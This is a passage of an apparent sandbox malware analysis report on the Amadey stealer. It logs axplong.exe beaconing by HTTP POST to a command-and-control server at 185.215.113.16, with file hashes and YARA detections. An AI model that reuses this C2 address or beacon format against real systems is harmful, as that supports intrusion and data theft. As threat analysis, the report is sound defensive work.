                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  49 | 192.168.2.5 | 49761 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:56.918185949 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:57.609208107 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:57.612977982 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:57.835885048 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:57 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  50 | 192.168.2.5 | 49762 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:57.949594975 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:58.652231932 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:58.653228998 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:58.880757093 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:58 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  51 | 192.168.2.5 | 49763 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:52:58.996516943 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:52:59.714957952 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:52:59.718410015 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:52:59.952755928 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:52:59 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  52 | 192.168.2.5 | 49764 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:00.075587034 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:00.789294958 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:53:00.790312052 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:01.032973051 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:00 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  53 | 192.168.2.5 | 49765 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:01.153599024 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:01.844961882 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:53:01.848648071 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:02.072056055 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:01 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  54 | 192.168.2.5 | 49766 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:02.185340881 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:02.884828091 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:02 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:53:02.885943890 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:03.127239943 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  55 | 192.168.2.5 | 49767 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:03.246793032 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:03.942074060 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:03 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  56 | 192.168.2.5 | 49768 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:03.954462051 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:04.715006113 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:04 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  57 | 192.168.2.5 | 49769 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:04.828118086 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:05.519107103 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:05 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  58 | 192.168.2.5 | 49770 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:05.529623032 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:06.238135099 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:06 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  59 | 192.168.2.5 | 49772 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:06.479152918 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:07.190201998 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  60 | 192.168.2.5 | 49773 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:07.317898989 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:08.038485050 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:07 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Sep 26, 2024 19:53:08.042412043 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:08.275141954 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                  61 | 192.168.2.5 | 49774 | 185.215.113.16 | 80 | 1408 | C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:08.393218994 CEST | 156 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Sep 26, 2024 19:53:09.086550951 CEST | 219 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:08 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0


                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                  62 | 192.168.2.5 | 49775 | 185.215.113.16 | 80
                  Timestamp | Bytes transferred | Direction | Data
                  Sep 26, 2024 19:53:09.100327969 CEST | 310 | OUT | POST /Jo89Ku7d/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.16
                  Content-Length: 156
                  Cache-Control: no-cache
                  Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CFF8A042CDFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                  Sep 26, 2024 19:53:09.811245918 CEST | 196 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Thu, 26 Sep 2024 17:53:09 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0



                  Target ID:0
                  Start time:13:51:04
                  Start date:26/09/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x20000
                  File size:1'936'896 bytes
                  MD5 hash:2EC94ACBF5439B6B76B4A04D1D779397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2147793843.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.2107291680.0000000004800000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:13:51:07
                  Start date:26/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
                  Imagebase:0xbf0000
                  File size:1'936'896 bytes
                  MD5 hash:2EC94ACBF5439B6B76B4A04D1D779397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.2143475152.00000000049D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.2184346914.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Antivirus matches:
                  • Detection: 100%, Avira
                  • Detection: 100%, Joe Sandbox ML
                  Reputation:low
                  Has exited:true

                  Target ID:3
                  Start time:13:51:08
                  Start date:26/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Imagebase:0xbf0000
                  File size:1'936'896 bytes
                  MD5 hash:2EC94ACBF5439B6B76B4A04D1D779397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.2148769900.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.2189315361.0000000000BF1000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Target ID:7
                  Start time:13:52:00
                  Start date:26/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Wow64 process (32bit):true
                  Commandline:C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                  Imagebase:0xbf0000
                  File size:1'936'896 bytes
                  MD5 hash:2EC94ACBF5439B6B76B4A04D1D779397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000007.00000003.2659233267.0000000005080000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:false

                    Memory Dump Source
                    • Source File: 00000000.00000002.2155255856.0000000004A20000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false